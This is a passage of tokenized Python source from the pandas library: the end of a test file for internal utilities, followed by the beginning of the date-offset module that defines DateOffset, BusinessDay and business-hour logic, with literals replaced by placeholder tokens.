'<STR_LIT>' ) <EOL> result = lib . infer_dtype ( Series ( arr ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = Categorical ( list ( '<STR_LIT:abc>' ) , categories = [ '<STR_LIT>' ] , ordered = True ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( Series ( arr ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> class TestMoments ( tm . TestCase ) : <EOL> pass <EOL> class TestReducer ( tm . TestCase ) : <EOL> def test_int_index ( self ) : <EOL> from pandas . core . series import Series <EOL> arr = np . random . randn ( <NUM_LIT:100> , <NUM_LIT:4> ) <EOL> result = lib . reduce ( arr , np . sum , labels = Index ( np . arange ( <NUM_LIT:4> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:0> ) <EOL> assert_almost_equal ( result , expected ) <EOL> result = lib . reduce ( arr , np . 
sum , axis = <NUM_LIT:1> , labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:1> ) <EOL> assert_almost_equal ( result , expected ) <EOL> dummy = Series ( <NUM_LIT:0.> , index = np . arange ( <NUM_LIT:100> ) ) <EOL> result = lib . reduce ( arr , np . sum , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:4> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:0> ) <EOL> assert_almost_equal ( result , expected ) <EOL> dummy = Series ( <NUM_LIT:0.> , index = np . arange ( <NUM_LIT:4> ) ) <EOL> result = lib . reduce ( arr , np . sum , axis = <NUM_LIT:1> , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:1> ) <EOL> assert_almost_equal ( result , expected ) <EOL> result = lib . reduce ( arr , np . sum , axis = <NUM_LIT:1> , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> assert_almost_equal ( result , expected ) <EOL> class TestTsUtil ( tm . TestCase ) : <EOL> def test_min_valid ( self ) : <EOL> Timestamp ( Timestamp . min ) <EOL> def test_max_valid ( self ) : <EOL> Timestamp ( Timestamp . max ) <EOL> def test_to_datetime_bijective ( self ) : <EOL> self . assertEqual ( <EOL> Timestamp ( Timestamp . max . to_pydatetime ( ) ) . value / <NUM_LIT:1000> , <EOL> Timestamp . max . value / <NUM_LIT:1000> ) <EOL> self . assertEqual ( <EOL> Timestamp ( Timestamp . min . to_pydatetime ( ) ) . value / <NUM_LIT:1000> , <EOL> Timestamp . min . value / <NUM_LIT:1000> ) <EOL> class TestPeriodField ( tm . TestCase ) : <EOL> def test_get_period_field_raises_on_out_of_range ( self ) : <EOL> self . assertRaises ( ValueError , period . get_period_field , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def test_get_period_field_array_raises_on_out_of_range ( self ) : <EOL> self . assertRaises ( ValueError , period . get_period_field_arr , - <NUM_LIT:1> , <EOL> np . empty ( <NUM_LIT:1> ) , <NUM_LIT:0> ) </s>
<s> from datetime import date , datetime , timedelta <EOL> from pandas . compat import range <EOL> from pandas import compat <EOL> import numpy as np <EOL> from pandas . tseries . tools import to_datetime , normalize_date <EOL> from pandas . core . common import ABCSeries , ABCDatetimeIndex <EOL> from dateutil . relativedelta import relativedelta , weekday <EOL> from dateutil . easter import easter <EOL> import pandas . tslib as tslib <EOL> from pandas . tslib import Timestamp , OutOfBoundsDatetime , Timedelta <EOL> import functools <EOL> import operator <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def as_timestamp ( obj ) : <EOL> if isinstance ( obj , Timestamp ) : <EOL> return obj <EOL> try : <EOL> return Timestamp ( obj ) <EOL> except ( OutOfBoundsDatetime ) : <EOL> pass <EOL> return obj <EOL> def as_datetime ( obj ) : <EOL> f = getattr ( obj , '<STR_LIT>' , None ) <EOL> if f is not None : <EOL> obj = f ( ) <EOL> return obj <EOL> def apply_wraps ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( self , other ) : <EOL> if other is tslib . NaT : <EOL> return tslib . NaT <EOL> elif isinstance ( other , ( timedelta , Tick , DateOffset ) ) : <EOL> return func ( self , other ) <EOL> elif isinstance ( other , ( np . datetime64 , datetime , date ) ) : <EOL> other = as_timestamp ( other ) <EOL> tz = getattr ( other , '<STR_LIT>' , None ) <EOL> nano = getattr ( other , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> if self . 
_adjust_dst and isinstance ( other , Timestamp ) : <EOL> other = other . tz_localize ( None ) <EOL> result = func ( self , other ) <EOL> if self . _adjust_dst : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> result = Timestamp ( result ) <EOL> if self . normalize : <EOL> result = result . normalize ( ) <EOL> if not self . normalize and nano != <NUM_LIT:0> : <EOL> if not isinstance ( self , Nano ) and result . nanosecond != nano : <EOL> if result . tz is not None : <EOL> value = tslib . tz_convert_single ( <EOL> result . value , '<STR_LIT>' , result . tz ) <EOL> else : <EOL> value = result . value <EOL> result = Timestamp ( value + nano ) <EOL> if tz is not None and result . tzinfo is None : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> except OutOfBoundsDatetime : <EOL> result = func ( self , as_datetime ( other ) ) <EOL> if self . normalize : <EOL> result = normalize_date ( result ) <EOL> if tz is not None and result . tzinfo is None : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> return result <EOL> return wrapper <EOL> def apply_index_wraps ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( self , other ) : <EOL> result = func ( self , other ) <EOL> if self . normalize : <EOL> result = result . to_period ( '<STR_LIT:D>' ) . to_timestamp ( ) <EOL> return result <EOL> return wrapper <EOL> def _is_normalized ( dt ) : <EOL> if ( dt . hour != <NUM_LIT:0> or dt . minute != <NUM_LIT:0> or dt . second != <NUM_LIT:0> or <EOL> dt . 
microsecond != <NUM_LIT:0> or getattr ( dt , '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> ) : <EOL> return False <EOL> return True <EOL> class ApplyTypeError ( TypeError ) : <EOL> pass <EOL> class CacheableOffset ( object ) : <EOL> _cacheable = True <EOL> class DateOffset ( object ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _normalize_cache = True <EOL> _kwds_use_relativedelta = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> _use_relativedelta = False <EOL> _adjust_dst = False <EOL> normalize = False <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . _offset , self . _use_relativedelta = self . _determine_offset ( ) <EOL> def _determine_offset ( self ) : <EOL> kwds_no_nanos = dict ( <EOL> ( k , v ) for k , v in self . kwds . items ( ) <EOL> if k not in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> use_relativedelta = False <EOL> if len ( kwds_no_nanos ) > <NUM_LIT:0> : <EOL> if any ( k in self . _kwds_use_relativedelta for k in kwds_no_nanos ) : <EOL> use_relativedelta = True <EOL> offset = relativedelta ( ** kwds_no_nanos ) <EOL> else : <EOL> offset = timedelta ( ** kwds_no_nanos ) <EOL> else : <EOL> offset = timedelta ( <NUM_LIT:1> ) <EOL> return offset , use_relativedelta <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if self . _use_relativedelta : <EOL> other = as_datetime ( other ) <EOL> if len ( self . kwds ) > <NUM_LIT:0> : <EOL> tzinfo = getattr ( other , '<STR_LIT>' , None ) <EOL> if tzinfo is not None and self . _use_relativedelta : <EOL> other = other . replace ( tzinfo = None ) <EOL> if self . n > <NUM_LIT:0> : <EOL> for i in range ( self . n ) : <EOL> other = other + self . _offset <EOL> else : <EOL> for i in range ( - self . 
n ) : <EOL> other = other - self . _offset <EOL> if tzinfo is not None and self . _use_relativedelta : <EOL> other = tslib . _localize_pydatetime ( other , tzinfo ) <EOL> return as_timestamp ( other ) <EOL> else : <EOL> return other + timedelta ( self . n ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> """<STR_LIT>""" <EOL> if not type ( self ) is DateOffset : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . __class__ . __name__ , ) ) <EOL> relativedelta_fast = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if ( self . _use_relativedelta and <EOL> set ( self . kwds ) . issubset ( relativedelta_fast ) ) : <EOL> months = ( ( self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) * <NUM_LIT:12> + <EOL> self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) * self . n ) <EOL> if months : <EOL> shifted = tslib . shift_months ( i . asi8 , months ) <EOL> i = i . _shallow_copy ( shifted ) <EOL> weeks = ( self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) * self . n <EOL> if weeks : <EOL> i = ( i . to_period ( '<STR_LIT>' ) + weeks ) . to_timestamp ( ) + i . to_perioddelta ( '<STR_LIT>' ) <EOL> timedelta_kwds = dict ( ( k , v ) for k , v in self . kwds . items ( ) <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if timedelta_kwds : <EOL> delta = Timedelta ( ** timedelta_kwds ) <EOL> i = i + ( self . n * delta ) <EOL> return i <EOL> elif not self . _use_relativedelta and hasattr ( self , '<STR_LIT>' ) : <EOL> return i + ( self . _offset * self . n ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( set ( self . kwds ) - relativedelta_fast ) , ) <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> def copy ( self ) : <EOL> return self . __class__ ( self . n , normalize = self . 
normalize , ** self . kwds ) <EOL> def _should_cache ( self ) : <EOL> return self . isAnchored ( ) and self . _cacheable <EOL> def _params ( self ) : <EOL> all_paras = dict ( list ( vars ( self ) . items ( ) ) + list ( self . kwds . items ( ) ) ) <EOL> if '<STR_LIT>' in all_paras and not all_paras [ '<STR_LIT>' ] : <EOL> all_paras . pop ( '<STR_LIT>' ) <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> attrs = [ ( k , v ) for k , v in all_paras . items ( ) <EOL> if ( k not in exclude ) and ( k [ <NUM_LIT:0> ] != '<STR_LIT:_>' ) ] <EOL> attrs = sorted ( set ( attrs ) ) <EOL> params = tuple ( [ str ( self . __class__ ) ] + attrs ) <EOL> return params <EOL> def __repr__ ( self ) : <EOL> className = getattr ( self , '<STR_LIT>' , type ( self ) . __name__ ) <EOL> exclude = set ( [ '<STR_LIT:n>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> attrs = [ ] <EOL> for attr in sorted ( self . __dict__ ) : <EOL> if ( ( attr == '<STR_LIT>' and len ( self . kwds ) == <NUM_LIT:0> ) or <EOL> attr . startswith ( '<STR_LIT:_>' ) ) : <EOL> continue <EOL> elif attr == '<STR_LIT>' : <EOL> kwds_new = { } <EOL> for key in self . kwds : <EOL> if not hasattr ( self , key ) : <EOL> kwds_new [ key ] = self . kwds [ key ] <EOL> if len ( kwds_new ) > <NUM_LIT:0> : <EOL> attrs . append ( '<STR_LIT:=>' . join ( ( attr , repr ( kwds_new ) ) ) ) <EOL> else : <EOL> if attr not in exclude : <EOL> attrs . append ( '<STR_LIT:=>' . join ( ( attr , repr ( getattr ( self , attr ) ) ) ) ) <EOL> if abs ( self . n ) != <NUM_LIT:1> : <EOL> plural = '<STR_LIT:s>' <EOL> else : <EOL> plural = '<STR_LIT>' <EOL> n_str = "<STR_LIT>" <EOL> if self . n != <NUM_LIT:1> : <EOL> n_str = "<STR_LIT>" % self . n <EOL> out = '<STR_LIT>' % n_str + className + plural <EOL> if attrs : <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> out += '<STR_LIT:>>' <EOL> return out <EOL> @ property <EOL> def name ( self ) : <EOL> return self . 
rule_code <EOL> def __eq__ ( self , other ) : <EOL> if other is None : <EOL> return False <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if not isinstance ( other , DateOffset ) : <EOL> return False <EOL> return self . _params ( ) == other . _params ( ) <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _params ( ) ) <EOL> def __call__ ( self , other ) : <EOL> return self . apply ( other ) <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , ( ABCDatetimeIndex , ABCSeries ) ) : <EOL> return other + self <EOL> try : <EOL> return self . apply ( other ) <EOL> except ApplyTypeError : <EOL> return NotImplemented <EOL> def __radd__ ( self , other ) : <EOL> return self . __add__ ( other ) <EOL> def __sub__ ( self , other ) : <EOL> if isinstance ( other , datetime ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> elif type ( other ) == type ( self ) : <EOL> return self . __class__ ( self . n - other . n , normalize = self . normalize , <EOL> ** self . kwds ) <EOL> else : <EOL> return NotImplemented <EOL> def __rsub__ ( self , other ) : <EOL> if isinstance ( other , ( ABCDatetimeIndex , ABCSeries ) ) : <EOL> return other - self <EOL> return self . __class__ ( - self . n , normalize = self . normalize , <EOL> ** self . kwds ) + other <EOL> def __mul__ ( self , someInt ) : <EOL> return self . __class__ ( n = someInt * self . n , normalize = self . normalize , <EOL> ** self . kwds ) <EOL> def __rmul__ ( self , someInt ) : <EOL> return self . __mul__ ( someInt ) <EOL> def __neg__ ( self ) : <EOL> return self . __class__ ( - self . n , normalize = self . normalize , ** self . kwds ) <EOL> def rollback ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> dt = as_timestamp ( dt ) <EOL> if not self . onOffset ( dt ) : <EOL> dt = dt - self . __class__ ( <NUM_LIT:1> , normalize = self . 
normalize , ** self . kwds ) <EOL> return dt <EOL> def rollforward ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> dt = as_timestamp ( dt ) <EOL> if not self . onOffset ( dt ) : <EOL> dt = dt + self . __class__ ( <NUM_LIT:1> , normalize = self . normalize , ** self . kwds ) <EOL> return dt <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if type ( self ) == DateOffset or isinstance ( self , Tick ) : <EOL> return True <EOL> a = dt <EOL> b = ( ( dt + self ) - self ) <EOL> return a == b <EOL> def _beg_apply_index ( self , i , freq ) : <EOL> """<STR_LIT>""" <EOL> off = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> from pandas . tseries . frequencies import get_freq_code <EOL> base , mult = get_freq_code ( freq ) <EOL> base_period = i . to_period ( base ) <EOL> if self . n <= <NUM_LIT:0> : <EOL> roll = np . where ( base_period . to_timestamp ( ) == i - off , <EOL> self . n , self . n + <NUM_LIT:1> ) <EOL> else : <EOL> roll = self . n <EOL> base = ( base_period + roll ) . to_timestamp ( ) <EOL> return base + off <EOL> def _end_apply_index ( self , i , freq ) : <EOL> """<STR_LIT>""" <EOL> off = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> from pandas . tseries . frequencies import get_freq_code <EOL> base , mult = get_freq_code ( freq ) <EOL> base_period = i . to_period ( base ) <EOL> if self . n > <NUM_LIT:0> : <EOL> roll = np . where ( base_period . to_timestamp ( how = '<STR_LIT:end>' ) == i - off , <EOL> self . n , self . n - <NUM_LIT:1> ) <EOL> else : <EOL> roll = self . n <EOL> base = ( base_period + roll ) . to_timestamp ( how = '<STR_LIT:end>' ) <EOL> return base + off <EOL> @ property <EOL> def _prefix ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return self . _prefix <EOL> @ property <EOL> def freqstr ( self ) : <EOL> try : <EOL> code = self . rule_code <EOL> except NotImplementedError : <EOL> return repr ( self ) <EOL> if self . 
n != <NUM_LIT:1> : <EOL> fstr = '<STR_LIT>' % ( self . n , code ) <EOL> else : <EOL> fstr = code <EOL> return fstr <EOL> @ property <EOL> def nanos ( self ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( self ) ) <EOL> class SingleConstructorOffset ( DateOffset ) : <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if suffix : <EOL> raise ValueError ( "<STR_LIT>" % suffix ) <EOL> return cls ( ) <EOL> class BusinessMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> className = getattr ( self , '<STR_LIT>' , self . __class__ . __name__ ) <EOL> if abs ( self . n ) != <NUM_LIT:1> : <EOL> plural = '<STR_LIT:s>' <EOL> else : <EOL> plural = '<STR_LIT>' <EOL> n_str = "<STR_LIT>" <EOL> if self . n != <NUM_LIT:1> : <EOL> n_str = "<STR_LIT>" % self . n <EOL> out = '<STR_LIT>' % n_str + className + plural + self . _repr_attrs ( ) + '<STR_LIT:>>' <EOL> return out <EOL> def _repr_attrs ( self ) : <EOL> if self . offset : <EOL> attrs = [ '<STR_LIT>' % repr ( self . offset ) ] <EOL> else : <EOL> attrs = None <EOL> out = '<STR_LIT>' <EOL> if attrs : <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> return out <EOL> class BusinessDay ( BusinessMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT:B>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> @ property <EOL> def freqstr ( self ) : <EOL> try : <EOL> code = self . rule_code <EOL> except NotImplementedError : <EOL> return repr ( self ) <EOL> if self . n != <NUM_LIT:1> : <EOL> fstr = '<STR_LIT>' % ( self . n , code ) <EOL> else : <EOL> fstr = code <EOL> if self . offset : <EOL> fstr += self . 
_offset_str ( ) <EOL> return fstr <EOL> def _offset_str ( self ) : <EOL> def get_str ( td ) : <EOL> off_str = '<STR_LIT>' <EOL> if td . days > <NUM_LIT:0> : <EOL> off_str += str ( td . days ) + '<STR_LIT:D>' <EOL> if td . seconds > <NUM_LIT:0> : <EOL> s = td . seconds <EOL> hrs = int ( s / <NUM_LIT> ) <EOL> if hrs != <NUM_LIT:0> : <EOL> off_str += str ( hrs ) + '<STR_LIT:H>' <EOL> s -= hrs * <NUM_LIT> <EOL> mts = int ( s / <NUM_LIT> ) <EOL> if mts != <NUM_LIT:0> : <EOL> off_str += str ( mts ) + '<STR_LIT>' <EOL> s -= mts * <NUM_LIT> <EOL> if s != <NUM_LIT:0> : <EOL> off_str += str ( s ) + '<STR_LIT:s>' <EOL> if td . microseconds > <NUM_LIT:0> : <EOL> off_str += str ( td . microseconds ) + '<STR_LIT>' <EOL> return off_str <EOL> if isinstance ( self . offset , timedelta ) : <EOL> zero = timedelta ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if self . offset >= zero : <EOL> off_str = '<STR_LIT:+>' + get_str ( self . offset ) <EOL> else : <EOL> off_str = '<STR_LIT:->' + get_str ( - self . offset ) <EOL> return off_str <EOL> else : <EOL> return '<STR_LIT:+>' + repr ( self . offset ) <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if isinstance ( other , datetime ) : <EOL> n = self . n <EOL> if n == <NUM_LIT:0> and other . weekday ( ) > <NUM_LIT:4> : <EOL> n = <NUM_LIT:1> <EOL> result = other <EOL> if abs ( n ) > <NUM_LIT:5> : <EOL> k = n // <NUM_LIT:5> <EOL> result = result + timedelta ( <NUM_LIT:7> * k ) <EOL> if n < <NUM_LIT:0> and result . weekday ( ) > <NUM_LIT:4> : <EOL> n += <NUM_LIT:1> <EOL> n -= <NUM_LIT:5> * k <EOL> if n == <NUM_LIT:0> and result . weekday ( ) > <NUM_LIT:4> : <EOL> n -= <NUM_LIT:1> <EOL> while n != <NUM_LIT:0> : <EOL> k = n // abs ( n ) <EOL> result = result + timedelta ( k ) <EOL> if result . weekday ( ) < <NUM_LIT:5> : <EOL> n -= k <EOL> if self . offset : <EOL> result = result + self . 
offset <EOL> return result <EOL> elif isinstance ( other , ( timedelta , Tick ) ) : <EOL> return BDay ( self . n , offset = self . offset + other , <EOL> normalize = self . normalize ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> time = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> shifted = ( i . to_perioddelta ( '<STR_LIT:B>' ) - time ) . asi8 != <NUM_LIT:0> <EOL> if self . n > <NUM_LIT:0> : <EOL> roll = np . where ( shifted , self . n - <NUM_LIT:1> , self . n ) <EOL> else : <EOL> roll = self . n <EOL> return ( i . to_period ( '<STR_LIT:B>' ) + roll ) . to_timestamp ( ) + time <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . weekday ( ) < <NUM_LIT:5> <EOL> class BusinessHourMixin ( BusinessMixin ) : <EOL> def __init__ ( self , ** kwds ) : <EOL> kwds [ '<STR_LIT:start>' ] = self . _validate_time ( kwds . get ( '<STR_LIT:start>' , '<STR_LIT>' ) ) <EOL> kwds [ '<STR_LIT:end>' ] = self . _validate_time ( kwds . get ( '<STR_LIT:end>' , '<STR_LIT>' ) ) <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . start = kwds . get ( '<STR_LIT:start>' , '<STR_LIT>' ) <EOL> self . end = kwds . get ( '<STR_LIT:end>' , '<STR_LIT>' ) <EOL> def _validate_time ( self , t_input ) : <EOL> from datetime import time as dt_time <EOL> import time <EOL> if isinstance ( t_input , compat . string_types ) : <EOL> try : <EOL> t = time . strptime ( t_input , '<STR_LIT>' ) <EOL> return dt_time ( hour = t . tm_hour , minute = t . tm_min ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif isinstance ( t_input , dt_time ) : <EOL> if t_input . second != <NUM_LIT:0> or t_input . 
microsecond != <NUM_LIT:0> : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> return t_input <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _get_daytime_flag ( self ) : <EOL> if self . start == self . end : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif self . start < self . end : <EOL> return True <EOL> else : <EOL> return False <EOL> def _next_opening_time ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not self . next_bday . onOffset ( other ) : <EOL> other = other + self . next_bday <EOL> else : <EOL> if self . n >= <NUM_LIT:0> and self . start < other . time ( ) : <EOL> other = other + self . next_bday <EOL> elif self . n < <NUM_LIT:0> and other . time ( ) < self . start : <EOL> other = other + self . next_bday <EOL> return datetime ( other . year , other . month , other . day , <EOL> self . start . hour , self . start . minute ) <EOL> def _prev_opening_time ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not self . next_bday . onOffset ( other ) : <EOL> other = other - self . next_bday <EOL> else : <EOL> if self . n >= <NUM_LIT:0> and other . time ( ) < self . start : <EOL> other = other - self . next_bday <EOL> elif self . n < <NUM_LIT:0> and other . time ( ) > self . start : <EOL> other = other - self . next_bday <EOL> return datetime ( other . year , other . month , other . day , <EOL> self . start . hour , self . start . minute ) <EOL> def _get_business_hours_by_sec ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _get_daytime_flag ( ) : <EOL> dtstart = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . start . hour , self . start . minute ) <EOL> until = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . end . hour , self . end . minute ) <EOL> return tslib . tot_seconds ( until - dtstart ) <EOL> else : <EOL> self . daytime = False <EOL> dtstart = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:1> , self . start . hour , self . start . minute ) <EOL> until = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:2> , self . 
end . hour , self . end . minute ) <EOL> return tslib . tot_seconds ( until - dtstart ) <EOL> @ apply_wraps <EOL> def rollback ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> if not self . onOffset ( dt ) : <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> dt = self . _prev_opening_time ( <EOL> dt ) + timedelta ( seconds = businesshours ) <EOL> else : <EOL> dt = self . _next_opening_time ( <EOL> dt ) + timedelta ( seconds = businesshours ) <EOL> return dt <EOL> @ apply_wraps <EOL> def rollforward ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> if not self . onOffset ( dt ) : <EOL> if self . n >= <NUM_LIT:0> : <EOL> return self . _next_opening_time ( dt ) <EOL> else : <EOL> return self . _prev_opening_time ( dt ) <EOL> return dt <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> daytime = self . _get_daytime_flag ( ) <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> bhdelta = timedelta ( seconds = businesshours ) <EOL> if isinstance ( other , datetime ) : <EOL> nanosecond = getattr ( other , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , <EOL> other . second , other . microsecond ) <EOL> n = self . n <EOL> if n >= <NUM_LIT:0> : <EOL> if ( other . time ( ) == self . end or <EOL> not self . _onOffset ( other , businesshours ) ) : <EOL> other = self . _next_opening_time ( other ) <EOL> else : <EOL> if other . time ( ) == self . start : <EOL> other = other - timedelta ( seconds = <NUM_LIT:1> ) <EOL> if not self . _onOffset ( other , businesshours ) : <EOL> other = self . _next_opening_time ( other ) <EOL> other = other + bhdelta <EOL> bd , r = divmod ( abs ( n * <NUM_LIT> ) , businesshours // <NUM_LIT> ) <EOL> if n < <NUM_LIT:0> : <EOL> bd , r = - bd , - r <EOL> if bd != <NUM_LIT:0> : <EOL> skip_bd = BusinessDay ( n = bd ) <EOL> if not self . next_bday . onOffset ( other ) : <EOL> remain = other - self . 
_prev_opening_time ( other ) <EOL> other = self . _next_opening_time ( other + skip_bd ) + remain <EOL> else : <EOL> other = other + skip_bd <EOL> hours , minutes = divmod ( r , <NUM_LIT> ) <EOL> result = other + timedelta ( hours = hours , minutes = minutes ) <EOL> if ( ( daytime and ( result . time ( ) < self . start or <EOL> self . end < result . time ( ) ) ) or <EOL> not daytime and ( self . end < result . time ( ) < self . start ) ) : <EOL> if n >= <NUM_LIT:0> : <EOL> bday_edge = self . _prev_opening_time ( other ) <EOL> bday_edge = bday_edge + bhdelta <EOL> bday_remain = result - bday_edge <EOL> result = self . _next_opening_time ( other ) <EOL> result += bday_remain <EOL> else : <EOL> bday_edge = self . _next_opening_time ( other ) <EOL> bday_remain = result - bday_edge <EOL> result = self . _next_opening_time ( result ) + bhdelta <EOL> result += bday_remain <EOL> if n >= <NUM_LIT:0> : <EOL> if result . time ( ) == self . end : <EOL> result = self . _next_opening_time ( result ) <EOL> else : <EOL> if result . time ( ) == self . start and nanosecond == <NUM_LIT:0> : <EOL> result = self . _next_opening_time ( <EOL> result - timedelta ( seconds = <NUM_LIT:1> ) ) + bhdelta <EOL> return result <EOL> else : <EOL> raise ApplyTypeError ( <EOL> '<STR_LIT>' ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if dt . tzinfo is not None : <EOL> dt = datetime ( dt . year , dt . month , dt . day , dt . hour , <EOL> dt . minute , dt . second , dt . microsecond ) <EOL> businesshours = self . _get_business_hours_by_sec ( ) <EOL> return self . _onOffset ( dt , businesshours ) <EOL> def _onOffset ( self , dt , businesshours ) : <EOL> """<STR_LIT>""" <EOL> if self . n >= <NUM_LIT:0> : <EOL> op = self . _prev_opening_time ( dt ) <EOL> else : <EOL> op = self . _next_opening_time ( dt ) <EOL> span = tslib . 
